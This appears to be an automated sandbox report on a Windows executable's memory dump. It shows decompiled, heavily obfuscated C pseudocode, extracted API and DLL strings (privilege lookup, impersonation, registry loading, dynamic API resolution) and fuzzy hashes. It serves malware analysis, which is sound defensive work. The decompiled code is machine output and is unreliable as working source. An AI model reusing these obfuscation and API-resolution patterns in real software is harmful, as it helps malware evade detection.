                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 45%
                                                          			E004CC620() {
                                                          				long _t36;
                                                          				long _t41;
                                                          				long _t45;
                                                          				long _t47;
                                                          				long _t54;
                                                          				unsigned short _t91;
                                                          				unsigned short _t92;
                                                          				intOrPtr _t103;
                                                          				void* _t105;
                                                          				void* _t107;
                                                          				void* _t108;
                                                          
                                                          				 *(_t108 - 0x18) =  !0x001EFA56;
                                                          				 *(_t108 - 0x64) = _t36;
                                                          				if(0xa0 >= 0) {
                                                          					 *0x50afe1 = _t36;
                                                          					 *0x50afe3 = _t36;
                                                          				}
                                                          				 *(_t108 - 8) = _t36;
                                                          				 *((intOrPtr*)(_t108 - 0x14)) = 0x3365e8;
                                                          				 *((intOrPtr*)(_t108 - 0x14)) = 0x3365e8;
                                                          				_t41 =  *(_t108 - 8);
                                                          				_t92 = _t91 >> _t91;
                                                          				if(_t92 <= _t92) {
                                                          					_t92 = 0x8150;
                                                          				}
                                                          				 *(_t108 - 8) = _t41;
                                                          				 *0x5080de =  *0x5080de + 0x3b65;
                                                          				_push( *((intOrPtr*)(_t108 - 0x60)));
                                                          				_t45 =  *(_t108 - 8);
                                                          				 *(_t108 - 8) = _t45;
                                                          				if(_t45 > 0x171c) {
                                                          					 *0x5080b2 =  *0x5080b2 -  !0x00000000;
                                                          					 *(_t108 - 0x18) =  !0x00000000;
                                                          					_t92 = _t92 + 0x545e4d;
                                                          				}
                                                          				 *0x50816e = _t92;
                                                          				_t103 =  *0x5081bc; // 0x381a
                                                          				_t47 = RegCloseKey(??);
                                                          				if(_t47 == 0) {
                                                          					_t105 = _t105;
                                                          					 *(_t108 - 0xc) = _t47;
                                                          				}
                                                          				 *(_t108 - 8) = _t47;
                                                          				 *0x508140 = 0x680b;
                                                          				_t52 =  *(_t108 - 8);
                                                          				L004BDD02( *(_t108 - 8), 0x1b592a, 0x7b, _t103 + 0x80bd, _t105, _t107,  *(_t108 - 8), _t52);
                                                          				_t54 =  *(_t108 - 8);
                                                          				if( *(_t108 - 0x64) == 0) {
                                                          					 *(_t108 - 0x18) = 0x296d98;
                                                          					 *((intOrPtr*)(_t108 - 0x68)) = 1;
                                                          				}
                                                          				 *(_t108 - 8) = _t54;
                                                          				 *((intOrPtr*)(_t108 - 0x14)) =  *((intOrPtr*)(_t108 - 0x14)) + "WindowsCodecs.dll";
                                                          				 *0x508162 =  *0x508162 + 0x62fb;
                                                          				_push(0x62fb);
                                                          				_push(1);
                                                          				_push(E004CC7D2);
                                                          				goto __ecx;
                                                          			}















                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: C1&$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$WindowsCodecs.dll$tsbyuv.dll$e3
                                                          • API String ID: 3535843008-3197220747
                                                          • Opcode ID: 6ef4518081ee94e561716ad114c813a4f2bae57cbb27d42aff625f45a58302d2
                                                          • Instruction ID: af91980a4b6d3abed53edd8424d06ba2cda6f880e5c663eb0e01ef1b4d7f6d6f
                                                          • Opcode Fuzzy Hash: 6ef4518081ee94e561716ad114c813a4f2bae57cbb27d42aff625f45a58302d2
                                                          • Instruction Fuzzy Hash: 114158B9E1030A9BCB00DFB8D9C5ADEBFB0FB29310F04517AD948E7346E2741A458B40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E004FF892(short __ecx, signed int __edx, void* __edi, short __esi) {
                                                          				int _t33;
                                                          				int _t35;
                                                          				int _t42;
                                                          				int _t43;
                                                          				int _t45;
                                                          				unsigned short _t62;
                                                          				intOrPtr _t75;
                                                          				signed int _t85;
                                                          				short _t89;
                                                          				void* _t90;
                                                          
                                                          				_t89 = __esi;
                                                          				_t85 = __edx;
                                                          				asm("adc eax, 0x508216");
                                                          				_t33 =  *(_t90 - 8);
                                                          				if( *((intOrPtr*)(_t90 - 0x40)) != 0) {
                                                          					 *0x50858f = _t33;
                                                          					 *(_t90 - 0xc) = _t33;
                                                          					 *(_t90 - 0x10) = 0xffffffffffffffd9;
                                                          					_t35 =  *(_t90 - 0xc);
                                                          					if(0xffffffffffffffb2 != 0xffffffffffffffb2) {
                                                          						 *0x50afdd =  *0x50afdd + __ecx;
                                                          						 *0x508150 = __ecx;
                                                          						 *0x50816c = __ecx;
                                                          						 *0x5081d4 =  *0x5081d4 - __edx;
                                                          						 *0x50afe0 =  *0x50afe0 - __edx;
                                                          					}
                                                          					 *(_t90 - 8) = _t35;
                                                          					_t75 =  *0x508156; // 0x124b
                                                          					 *0x50818a =  *0x50818a - _t75;
                                                          					 *0x5081a4 =  *0x5081a4 + _t85;
                                                          					E004AD021( *(_t90 - 8), "Display.dll", _t75, 1, 1,  *(_t90 - 8));
                                                          					_t42 =  *(_t90 - 8);
                                                          					 *(_t90 - 8) = _t42;
                                                          					if(_t42 > 0x1b) {
                                                          						if(_t42 > 0x1f4821) {
                                                          							 *(_t90 - 0x14) = "EnumWindowStationsA";
                                                          						}
                                                          					}
                                                          					 *((intOrPtr*)(_t90 - 0x1c)) =  *((intOrPtr*)(_t90 - 0x1c)) - 0x61f4;
                                                          					 *0x508196 = 0x61f4;
                                                          					_t43 =  *(_t90 - 8);
                                                          					_push( *((intOrPtr*)(_t90 - 0x40)));
                                                          					 *0x50afe6 = _t43;
                                                          					 *(_t90 - 8) = _t43;
                                                          					_t62 = 0x3d70e8 >> 0x61f4;
                                                          					_t45 =  *(_t90 - 8);
                                                          					if((_t85 & 0x007602fa) >= 0) {
                                                          						_t85 = _t85 + 0x84277e;
                                                          						 *0x508238 = _t89;
                                                          						 *0x50afe5 = _t45;
                                                          						if(_t45 <= 0) {
                                                          						}
                                                          						_t62 = 0x292a00;
                                                          					}
                                                          					if(_t62 != 0x35c8) {
                                                          						L14:
                                                          						 *0x5081ea = _t85;
                                                          					} else {
                                                          						 *(_t90 - 0x10) = _t62;
                                                          						_t62 = _t62 - 0x4e;
                                                          						if(0x5d34 >= 0x5d34) {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          					_t33 = FreeLibrary();
                                                          				}
                                                          				return  *((intOrPtr*)(_t90 - 0x4c));
                                                          			}














                                                          APIs
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004FFA16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: Display.dll$EnumWindowStationsA$RtlEthernetStringToAddressW$credssp.dll$p=
                                                          • API String ID: 3664257935-2222342485
                                                          • Opcode ID: 444df9aee8f6098dac06b8b36ad404476d7f9ac72f228940b920aaa67cab7ed8
                                                          • Instruction ID: 179f79963e47a61a3cd8e3eb1df2e083c96c56e3f4f45ed35f1705f893bea87d
                                                          • Opcode Fuzzy Hash: 444df9aee8f6098dac06b8b36ad404476d7f9ac72f228940b920aaa67cab7ed8
                                                          • Instruction Fuzzy Hash: 65417975A4530A9FCB00DFB8E894AEE7BB0FF39310F04846AD685E7352E6744949CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 55%
                                                          			E004B2C1E() {
                                                          				long _t32;
                                                          				long _t37;
                                                          				char* _t38;
                                                          				long _t40;
                                                          				long _t42;
                                                          				char* _t51;
                                                          				void* _t82;
                                                          				void* _t83;
                                                          				void* _t84;
                                                          				void* _t86;
                                                          
                                                          				 *((intOrPtr*)(_t86 - 0x10)) = 0x3870de;
                                                          				_t32 =  *(_t86 - 8);
                                                          				_t51 =  *((intOrPtr*)(_t86 - 0x14)) - 0x4fbe;
                                                          				 *(_t86 - 8) = _t32;
                                                          				if(_t32 >= 0x1e0793) {
                                                          					_t32 =  *(_t86 - 0xc);
                                                          					 *0x5080d6 =  *0x5080d6 + _t51 - 0x333e5a;
                                                          					_t51 = 0x665a;
                                                          					if(0x665a <= 0x665a) {
                                                          						E00508174 = E00508174 - 0x665a;
                                                          					}
                                                          					 *0x508192 = 0x665a;
                                                          				}
                                                          				_t83 = _t82 + _t82;
                                                          				 *0x5081d6 =  *0x5081d6 - 0x85cb;
                                                          				 *(_t86 - 8) = 1;
                                                          				if(1 < 0x2057) {
                                                          					if(_t51 != 0x39) {
                                                          						_t51 = "api-ms-win-core-rtlsupport-l1-1-0.dll";
                                                          					}
                                                          				}
                                                          				_t65 = 0x674c;
                                                          				 *0x5081a6 = 0x674c;
                                                          				_t78 = 0x871324;
                                                          				_t37 = GetLastError();
                                                          				 *0x5081f4 = 0x871324;
                                                          				 *(_t86 - 8) = _t37;
                                                          				_t38 = "wmi.dll";
                                                          				if(_t51 == 0x25f343) {
                                                          					_t51 = "LookupPrivilegeValueA";
                                                          					_t65 = 0xe16f;
                                                          					_t78 =  *0x5081fa; // 0x8a34
                                                          				}
                                                          				 *0x50afe1 = _t38;
                                                          				_t84 = _t83 + 0xc800;
                                                          				 *0x50afe5 = 0;
                                                          				_t40 =  *(_t86 - 8);
                                                          				 *(_t86 - 8) = _t40;
                                                          				 *(_t86 - 8) = _t40;
                                                          				_t42 =  *(_t86 - 8);
                                                          				 *(_t86 - 0x44) = _t42;
                                                          				if((_t78 - 0x0000009d & 0x000000a5) == 0) {
                                                          					 *0x509dc3 =  *0x509dc3 - _t84;
                                                          				}
                                                          				 *(_t86 - 8) = _t42;
                                                          				E004B009D(_t42, 0, _t65, _t42, _t42, _t42);
                                                          				 *((intOrPtr*)(_t86 - 0x10)) =  *((intOrPtr*)(_t86 - 0x10)) + 0x36e765;
                                                          				 *(_t86 - 0xc) =  *(_t86 - 0xc) + 0x22a07e;
                                                          				 *((intOrPtr*)(_t86 - 0x10)) = 0x36e765;
                                                          				 *0x508136 =  *0x508136 + _t65;
                                                          				_push(0x4b2ed4);
                                                          				goto __ecx;
                                                          			}














                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: 9$EtwEventWriteStartScenario$LookupPrivilegeValueA$api-ms-win-core-rtlsupport-l1-1-0.dll$e6$wmi.dll
                                                          • API String ID: 1452528299-1352662038
                                                          • Opcode ID: 7d76826fbe4d2e8d0ac3ca8325b30bacd023d218022c18ba4d0e9dfc5a5dfb67
                                                          • Instruction ID: 1a9d487725b299bf176bc5815d09ba955bf3d59fe955111d32ae38c47532a754
                                                          • Opcode Fuzzy Hash: 7d76826fbe4d2e8d0ac3ca8325b30bacd023d218022c18ba4d0e9dfc5a5dfb67
                                                          • Instruction Fuzzy Hash: DA41CE75E003069BCB00DFB8D898AEDBBB1FF28310F00816AD895E7755E7784A46DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00472430
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: B5d$api-ms-win-core-sysinfo-l1-1-0.dll$wlanmsm.dll$wmi.dll$Nqt
                                                          • API String ID: 190572456-1385513556
                                                          • Opcode ID: 243b077be5ff0587b00fa8e6cb81b153b4ae19c2bbcbc70fdb9dc8df7b70dfc4
                                                          • Instruction ID: 150050ec6de9ffcef7b585dbee52c71597650d43a847ccef349c093d59c8f24f
                                                          • Opcode Fuzzy Hash: 243b077be5ff0587b00fa8e6cb81b153b4ae19c2bbcbc70fdb9dc8df7b70dfc4
                                                          • Instruction Fuzzy Hash: 6E418E78A54346DFCB01DFB8ED94AED7BB0EB39310F08816AD884D7762D2780549DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CIRCoInst.dll$credssp.dll$ddrawex.dll$nshhttp.dll$Nqt
                                                          • API String ID: 190572456-4289997220
                                                          • Opcode ID: 1b469da61f081826baf558363e0e863892bc7eddad6ec6e0b3c8986c09ea51c7
                                                          • Instruction ID: 7206b75216fc9e8d6becb0b21179a177ea0e3151b99b8d52cf0857d1718dbf9b
                                                          • Opcode Fuzzy Hash: 1b469da61f081826baf558363e0e863892bc7eddad6ec6e0b3c8986c09ea51c7
                                                          • Instruction Fuzzy Hash: F241A174A54706ABCB00DF78EC94AEDBBB0FF38324B04816AE484E7365EA740549DB09
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CreateMutexW$\Z $lprmonui.dll$wmi.dll$Nqt
                                                          • API String ID: 190572456-556655420
                                                          • Opcode ID: aef21f31fb8b4b0a7be9707394fc250412d53352a0c7401a6b65d82a7fef165c
                                                          • Instruction ID: 544e60698cff5da9509ccf82d4ccbfe7daa20ef13f9bdeecd52e43b83e9a8ce9
                                                          • Opcode Fuzzy Hash: aef21f31fb8b4b0a7be9707394fc250412d53352a0c7401a6b65d82a7fef165c
                                                          • Instruction Fuzzy Hash: 4B314D34A0470ADBCB00DFA9D4D59DDBBB1FB28320F80816AC944E7311E779194ADF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 21%
                                                          			E004949F6() {
                                                          				_Unknown_base(*)()* _t13;
                                                          				_Unknown_base(*)()* _t18;
                                                          				_Unknown_base(*)()* _t20;
                                                          				unsigned short _t34;
                                                          				unsigned short _t35;
                                                          				signed int _t37;
                                                          				short _t41;
                                                          				intOrPtr _t43;
                                                          				void* _t48;
                                                          				short _t49;
                                                          				void* _t52;
                                                          
                                                          				_t13 =  *(_t52 - 8);
                                                          				_t35 = _t34 >> _t34;
                                                          				_push( *((intOrPtr*)(_t52 - 0x2c)));
                                                          				 *0x50815e = _t35;
                                                          				if(_t35 >= _t35) {
                                                          					_t35 = 0x5081aa;
                                                          					_t41 = _t41 + 1;
                                                          					 *0x5081f8 = _t41;
                                                          					 *0x50afe3 = _t13;
                                                          				}
                                                          				_t49 = _t48 + _t48;
                                                          				 *(_t52 - 8) = _t13;
                                                          				 *0x5080f2 =  *0x5080f2;
                                                          				 *((intOrPtr*)(_t52 - 0xc)) = 0x43;
                                                          				 *0x508132 = _t35;
                                                          				_t37 = _t35 - 0xfffffffffffff03b;
                                                          				 *0x5081d0 = _t41;
                                                          				_t43 =  *0x508200; // 0x7ac4
                                                          				 *0x50afe1 =  *(_t52 - 8);
                                                          				_t18 = GetProcAddress( *0x508457, ??);
                                                          				 *0x508220 = _t43 + 1;
                                                          				 *0x50823a = _t49;
                                                          				 *(_t52 - 8) = _t18;
                                                          				_t20 =  *(_t52 - 8);
                                                          				if(_t18 >= 0x312170 &&  !_t37 >=  !_t37) {
                                                          					 *0x5081ec = 0x859f;
                                                          					 *0x508270 =  *0x508270 - _t49;
                                                          				}
                                                          				 *(_t52 - 8) = _t20;
                                                          				_push(_t20);
                                                          				_push(_t20);
                                                          				_push(E00494B11);
                                                          				goto __eax;
                                                          			}















                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00494A9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: WSearchMigPlugin.dll$ddrawex.dll$p!1$wmi.dll$Nqt
                                                          • API String ID: 190572456-1434471290
                                                          • Opcode ID: 1b2921f914b72eab74fb7f95c609b86a1c8a99553c2d88909ee7b918e1d1c9e0
                                                          • Instruction ID: 4073f9c71a5283d276482602a1436542289123992978350e6f9d1b410fc3b36a
                                                          • Opcode Fuzzy Hash: 1b2921f914b72eab74fb7f95c609b86a1c8a99553c2d88909ee7b918e1d1c9e0
                                                          • Instruction Fuzzy Hash: 51217879A50A06DFCB01DF78EC94DAD7BB1FF38300B08912AD885D3325EA740949E749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID: AllocConsole$ddrawex.dll$nshhttp.dll$psxdllsvr.dll$wmi.dll
                                                          • API String ID: 2538663250-1976682281
                                                          • Opcode ID: 88b7c50b5cd9610c0102dbe9056d993bc6a17bf5403cb4d881ad5c00f675bfb5
                                                          • Instruction ID: 478169b490302f1d2c9f35be93f70a0825a486b31e9fba41cad099c8c8b462a3
                                                          • Opcode Fuzzy Hash: 88b7c50b5cd9610c0102dbe9056d993bc6a17bf5403cb4d881ad5c00f675bfb5
                                                          • Instruction Fuzzy Hash: E441D379A10786CFCB01CF79EC886CD7FB1EB7A310B08516AC5819B367D2340649E706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: B5d$WcnEapAuthProxy.dll$d_=$Nqt
                                                          • API String ID: 190572456-874474735
                                                          • Opcode ID: 739345941ca5f098ae224f1c37f80f69c9a784404871b9e3814e1b80d30c922e
                                                          • Instruction ID: 225a91809ffca486620b264475cb48247e1e9ed6f8563af5068c47f21ab7bdab
                                                          • Opcode Fuzzy Hash: 739345941ca5f098ae224f1c37f80f69c9a784404871b9e3814e1b80d30c922e
                                                          • Instruction Fuzzy Hash: C5A1DFB5A507069FCB00EFB9EC98AED7BB1EF38314F04412ED88897362EA750549D749
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RtlEthernetStringToAddressW$api-ms-win-core-sysinfo-l1-1-0.dll$wlanmsm.dll$Nqt
                                                          • API String ID: 190572456-922246249
                                                          • Opcode ID: b7135aa9bbf42999368f7364d1fb1f7acee9ce40468ec260462f0fc81de8092d
                                                          • Instruction ID: bb0ae3e416deb5da211429561c45743742c7d8c3d61e61e00bc4544f482bcc45
                                                          • Opcode Fuzzy Hash: b7135aa9bbf42999368f7364d1fb1f7acee9ce40468ec260462f0fc81de8092d
                                                          • Instruction Fuzzy Hash: DE51E2B5F447469FCB01EFB9EC94BEE7BB0EB39310F08442AD94497752E2780949A345
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0048E2AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: 8$CIRCoInst.dll$DismHost.exe$Nqt
                                                          • API String ID: 190572456-888350561
                                                          • Opcode ID: 918e942b95560f9704aacd0a07a1362529585dff6030b0c7d14ea8f06426887f
                                                          • Instruction ID: 602035a3a9da41c2f1d751b1a8513e481c60c518d3e42beaeb75ce24491b831e
                                                          • Opcode Fuzzy Hash: 918e942b95560f9704aacd0a07a1362529585dff6030b0c7d14ea8f06426887f
                                                          • Instruction Fuzzy Hash: 0441E579E403469BC700DF79EC99DEE3F71EB79310B04416AD88593762E7340509E755
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CommandLine
                                                          • String ID: D4$charmap.exe$credssp.dll$psxdllsvr.dll
                                                          • API String ID: 3253501508-2777294816
                                                          • Opcode ID: 715e730164055289e3b67c742f1fd6ed5af2c632f8cd4466764f949ed0a7b8a9
                                                          • Instruction ID: 72919a8bd494484e95392ab4e3bc6e3c6be4fad8d5efdec070374de97f78719a
                                                          • Opcode Fuzzy Hash: 715e730164055289e3b67c742f1fd6ed5af2c632f8cd4466764f949ed0a7b8a9
                                                          • Instruction Fuzzy Hash: D641E26AA517828FD700DF38EC59BDE3BA1FB39320F04513A9884973E6E6340549E716
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00496AB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RRj$credssp.dll$we$$Nqt
                                                          • API String ID: 190572456-913505113
                                                          • Opcode ID: 4e331f677e604bb74d3fae4c08fe561d665efc0bb5772b8bc61e89857c9739e0
                                                          • Instruction ID: 5a1c6126462f4114fa398f23f2637442c3c60eaa7f0335204d1d519aee26fa92
                                                          • Opcode Fuzzy Hash: 4e331f677e604bb74d3fae4c08fe561d665efc0bb5772b8bc61e89857c9739e0
                                                          • Instruction Fuzzy Hash: 6B41CEB8E403469FCF01DFB8D8909EE7FB0EB2A310B54806BD885E7312E2354889DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: LookupPrivilegeValueA$RtlEthernetStringToAddressW$lyncicon.exe$Nqt
                                                          • API String ID: 190572456-539634128
                                                          • Opcode ID: 0a66d9b77f67b3e1e7e6c8de2e227a9fa6421284eb2227568f1f5e9011ff0a82
                                                          • Instruction ID: 0c1c058608777a9dd9a35f90b2e0f8d97da906d8e7c0a5cf814c7b10f7af18a6
                                                          • Opcode Fuzzy Hash: 0a66d9b77f67b3e1e7e6c8de2e227a9fa6421284eb2227568f1f5e9011ff0a82
                                                          • Instruction Fuzzy Hash: B9319DB9A503829FCB00DFB9EC909EC7BB1FB35300B48416E9885D7325E6B40549EB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,00000000), ref: 004CD7D6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID: BuildExplicitAccessWithNameA$WcnEapAuthProxy.dll$ZwLoadKeyEx$api-ms-win-core-rtlsupport-l1-1-0.dll
                                                          • API String ID: 2289755597-3938352633
                                                          • Opcode ID: 1537c05db238c747134345ac1831970058689b8ce613353b545c93a17f2a07aa
                                                          • Instruction ID: 6bc98170748adfc2114eeaf668935e25c23d1e48ee6c7c51a2ab72bdaf217201
                                                          • Opcode Fuzzy Hash: 1537c05db238c747134345ac1831970058689b8ce613353b545c93a17f2a07aa
                                                          • Instruction Fuzzy Hash: 3E318C79E40606AFCB00DFA8D894ADD7BB0FF39300F044429E485E7361E3355A89D745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,00000001), ref: 004A08FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RemoveVectoredExceptionHandler$SystemPropertiesComputerName.exe$h($Nqt
                                                          • API String ID: 190572456-2048438507
                                                          • Opcode ID: 46d6d47958950fc958fc1f4f71b6f233b46f5012f795e53625c05ce06352dd2d
                                                          • Instruction ID: 4368c4ccae275847e7ebbbdb1e404c695e6d0dbd48467e48243be78c9e44eb04
                                                          • Opcode Fuzzy Hash: 46d6d47958950fc958fc1f4f71b6f233b46f5012f795e53625c05ce06352dd2d
                                                          • Instruction Fuzzy Hash: 9221F2B5A143069FDB00EFB8D895BDC3BF1FB3A324F0040AAD58997752D63909059745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EnumWindowStationsA$Sr0$diskperf.exe$Nqt
                                                          • API String ID: 190572456-1598637452
                                                          • Opcode ID: dee11cccfd1529b4d2f9c8bdad33cc9df83b9d379c079f57a01fdd710746f205
                                                          • Instruction ID: 07ef9dae4a3c871b0ce8ae70ee245d1878aab7bce912faf4b626f864288f0a72
                                                          • Opcode Fuzzy Hash: dee11cccfd1529b4d2f9c8bdad33cc9df83b9d379c079f57a01fdd710746f205
                                                          • Instruction Fuzzy Hash: 6921A4B5A00345CFDB00DFB8E854AED3BB2EF3A310B44816AC885D7776E675494AD345
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0046ED3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: wmi.dll$Nqt$t7
                                                          • API String ID: 190572456-2631463486
                                                          • Opcode ID: 2886ff682793c37c36f2dec8d442e1c1fcc95b995a71499e0460dfafb6186149
                                                          • Instruction ID: 837f40a6ddf4115bac9c86d48001a0ff3b49e93b50f263334a12337154d90e77
                                                          • Opcode Fuzzy Hash: 2886ff682793c37c36f2dec8d442e1c1fcc95b995a71499e0460dfafb6186149
                                                          • Instruction Fuzzy Hash: 2C41BD78E542069FCB00DFAAE8946DDBFF1FB38310F4480BA8585E7365E679054ADB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00474B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: RtlImpersonateSelfEx$ddrawex.dll$Nqt
                                                          • API String ID: 190572456-1780917239
                                                          • Opcode ID: 65a843699a4b0d38477fed0e65f015b79473080197e8d48dba81ee7f5a24ee50
                                                          • Instruction ID: 4ae5830ff229aef22553f9deefcf4175960be1eecb69cfad7f91f2d2be5c65ef
                                                          • Opcode Fuzzy Hash: 65a843699a4b0d38477fed0e65f015b79473080197e8d48dba81ee7f5a24ee50
